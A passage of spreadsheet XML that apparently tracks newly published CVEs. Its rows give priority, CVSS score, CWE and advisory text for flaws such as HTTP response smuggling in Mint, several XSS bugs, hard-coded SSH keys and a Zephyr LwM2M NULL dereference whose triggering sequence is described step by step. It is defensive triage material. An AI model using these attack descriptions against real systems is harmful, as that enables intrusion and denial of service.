The fix validates ll_hdr_len + net_pkt_get_len(pkt) + authtag_len against IEEE802154_MTU before any copy and adds a tailroom-checking copy_pkt_to_frame() helper that returns -EMSGSIZE instead of overrunning the buffer. The same change also linearizes the whole net_buf chain into one MAC frame, so packet storage boundaries no longer become frame boundaries on the wire.</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18415</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82929</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S99" s="5" t="inlineStr">
        <is>
          <t>mH-DEVELOPER smart home module uses the same hard-coded SSH host keys on every device, with no per-device key generation. An attacker who extracts these keys from the firmware can set up a rogue SSH server that clients will trust without warning, enabling man-in-the-middle attacks and credential interception.
This issue was fixed in version 3.0.30</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82929</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86335</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S100" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization in imageDownload in Canonical LXD before 5.0.10, 5.21.8, and 6.10 on Linux allows a project-restricted client to access private images from other projects via local fingerprint reuse during image or instance import requests.</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86335</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94194</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="inlineStr"/>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="S101" s="5" t="inlineStr">
        <is>
          <t>Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in elixir-mint mint allows a malicious HTTP/1 server to desynchronize an intermediary and the Mint client on a pooled connection, poisoning the responses to subsequent requests that share the connection.
message_body/1 in lib/mint/http1.ex selects chunked framing when chunked is the first coding listed in a response's Transfer-Encoding fields. RFC 9112 section 6.3 applies chunked framing only when chunked is the final coding, and otherwise reads the body until the server closes the connection. For a response such as Transfer-Encoding: chunked, gzip, an intermediary that follows the RFC treats every byte up to the close as the body, while Mint ends the body at the zero-length chunk and parses the remaining bytes as the response to the next request on the connection.
Mint also keeps the connection open after an HTTP/1.0 response, final or 1xx, that carries Transfer-Encoding and Connection: keep-alive. RFC 9112 section 6.1 requires treating the framing of such a message as faulty and closing the connection after it, so bytes after its chunked body are parsed as the response to the next request in the same way.
This issue affects mint: from 0.1.0 before 1.11.0.</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94194</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102333</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S102" s="5" t="inlineStr">
        <is>
          <t>httpdbg before 2.2.1 fails to validate URL schemes in recorded HTTP request URLs rendered as clickable links in the web interface. Attackers controlling traffic recorded by httpdbg can supply javascript: scheme URLs that execute malicious scripts in the application origin when clicked, allowing access to captured request and response data including headers and tokens.</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102333</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102372</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S103" s="5" t="inlineStr">
        <is>
          <t>GestSup versions before 3.2.62 fail to properly sanitize HTML email bodies in the IMAP LOGIN connector, allowing unauthenticated attackers to store arbitrary JavaScript in ticket descriptions and replies. Attackers can send emails to the monitored mailbox containing script tags and event handlers that execute in technician browsers, enabling ticket data theft and unauthorized actions.</t>
        </is>
      </c>
      <c r="T103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102372</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82546</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S104" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in Apache Roller 6.1.5 allows an unauthenticated remote attacker to store a crafted comment-author URL through the incoming Trackback endpoint when a published entry accepts comments and Trackbacks. The shipped Trackback, verification and moderation defaults allow the value to be approved and rendered as an active link; a visitor who clicks the link executes script in the weblog's origin. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which removes incoming Trackback support and suppresses non-HTTP(S) comment-author links. Users unable to upgrade should disable Trackbacks and remove untrusted Trackback comments.</t>
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82546</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102274</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="inlineStr"/>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="S105" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.9.0 until 2.14.0, PyJWKSet does not catch the plain ValueError raised for malformed RSA JWK components by RSAAlgorithm.from_jwk in  jwt/api_jwk.py. This occurs when a JWK Set contains a malformed RSA key alongside otherwise usable keys. As a result, one malformed member aborts construction of the entire PyJWKSet. Consequently, applications can experience authentication failures or request-level denial of service. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102274</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18746</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr">
        <is>
          <t>requests, rust</t>
        </is>
      </c>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S106" s="5" t="inlineStr">
        <is>
          <t>parse_write_op() in subsys/net/lib/lwm2m/lwm2m_message_handling.c handles inbound CoAP WRITE/CREATE requests that carry a Block1 option. For the first block of a transfer it called init_block_ctx() and then immediately stored the peer-selected block size with block_ctx-&gt;ctx.block_size = block_size before inspecting the return code. init_block_ctx() sets the caller's pointer to NULL and returns -ENOMEM when no entry of the static block1_contexts[] pool is free or timed out, so that store dereferences a NULL pointer.
The pool holds CONFIG_LWM2M_NUM_BLOCK1_CONTEXT entries (default 3) and an entry is only reclaimed once its transfer completes, fails, or ages past 30 seconds. A peer that reaches the client's LwM2M socket can therefore start three block-wise writes on three distinct object paths with the CoAP More bit set and leave them incomplete, then send the first block of a fourth write on a new path to reach the unguarded dereference. Reachability is gated only by the connected UDP socket's source-address filter unless CONFIG_LWM2M_DTLS_SUPPORT is enabled — which has no default — so in a NoSec deployment an on-path or address-spoofing attacker needs no credentials; the same sequence is also reachable from a bootstrap or lower-trust server, and can be hit accidentally by a legitimate server running four concurrent block transfers.
The write targets a fixed low address with a value between 0 and 7, so the consequence is a fatal memory fault (BusFault or corrupted low memory leading to a fault) rather than a usable memory-corruption primitive: the device crashes or resets. Confidentiality and integrity are not affected. The fix moves the store below the guard and validates the context pointer itself instead of the return code, so the context is only touched once it is known to be valid.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18746</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82936</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr"/>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S107" s="5" t="inlineStr">
        <is>
          <t>mH-DEVELOPER smart home module is vulnerable to Denial of Service due to uncontrolled resource consumption. The Express bodyParser is configured with a 250 MB limit for JSON and URL-encoded request bodies. An authenticated attacker on the LAN can send large request bodies that exhausts buffers in RAM, causing out-of-memory conditions and crashing the fh-node process, resulting in denial of service. The successful attack depends on the current memory usage of the device which is not under full control of the attacker. Critically, due to CVE-2026-82930 all endpoints can be queried unauthenticated, so any user on LAN can perform this attack.
This issue was fixed in version 3.0.30</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82936</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70413</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr">
        <is>
          <t>dell</t>
        </is>
      </c>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>CWE-259</t>
        </is>
      </c>
      <c r="S108" s="5" t="inlineStr">
        <is>
          <t>Dell Live Optics Collector, versions prior to 27.2.13.310, contain(s) a Use of Hard-coded Password vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information exposure.</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70413</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101005</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S109" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in October CMS up to 4.3.4. This affects the function validateExternalImageHost of the file System/Classes/ResizeImages.php of the component SSRF Protection. The manipulation results in server-side request forgery. The attack may be launched remotely. The exploit is now public and may be used. Upgrading to version 4.3.5 is able to mitigate this issue. You should upgrade the affected component.</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101005</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101013</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S110" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. Affected is an unknown function of the file updateresultdetails.php. Such manipulation of the argument editid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101013</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101014</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="inlineStr"/>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>CWE-189, CWE-193</t>
        </is>
      </c>
      <c r="S111" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Trusted Domain Project OpenDMARC up to 1.4.2. Affected by this vulnerability is the function opendmarc_util_cleanup in the library libopendmarc/opendmarc_util.c of the component DMARC Record Parser. Performing a manipulation results in off-by-one. The attack may be initiated remotely. The exploit is now public and may be used. The patch is named b3b1da9264bc80324094a27c71e7369bdedc62ae. To fix this issue, it is recommended to deploy a patch.</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101014</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101016</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="inlineStr"/>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="S112" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Trusted Domain Project OpenDMARC up to 1.4.2. This affects the function opendmarc_policy_parse_dmarc in the library libopendmarc/opendmarc_policy.c. The manipulation of the argument fo/rf/ri/pct/sp/adkim/aspf/rua/ruf leads to handling of exceptional conditions. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101016</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101017</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
